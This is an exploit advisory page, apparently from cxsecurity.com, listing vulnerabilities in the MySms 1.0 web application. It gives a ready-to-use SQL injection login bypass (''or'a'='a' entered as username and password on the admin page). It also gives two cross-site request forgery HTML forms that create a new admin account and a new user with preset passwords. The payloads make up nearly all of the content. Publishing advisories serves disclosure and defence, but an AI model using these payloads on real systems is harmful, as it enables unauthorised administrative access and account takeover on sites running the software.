MySms 1.0 SQL Injection / Cross Site Request Forgery

2011.03.08
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

MySms v1.0 Multiple Vulnerabilities ==================================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] #################################################################### ===[ Exploit ]=== [1]Auth Bypass =============== www.site.com/MySms/admin/index.php Username: 'or'a'='a Password: 'or'a'='a [2]CSRF ======= [Add Admin] ------------ <form method="POST" name="form0" action="http://www.site/MySms/admin/adminadd.php"> <input type="hidden" name="username" value="Webadmin"/> <input type="hidden" name="passwd" value="123456"/> </form> </body> </html> [Add User] ----------- <form method="POST" name="form0" action="http://www.site/MySms/admin/usersadd.php"> <input type="hidden" name="username" value="user"/> <input type="hidden" name="passwd" value="123456"/> <input type="hidden" name="active" value="y"/> <input type="hidden" name="email" value="Example@hotmail.com"/> <input type="hidden" name="sex" value="m"/> <input type="hidden" name="level" value="a"/> <input type="hidden" name="num_msg" value="100"/> </form> </body> </html> ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top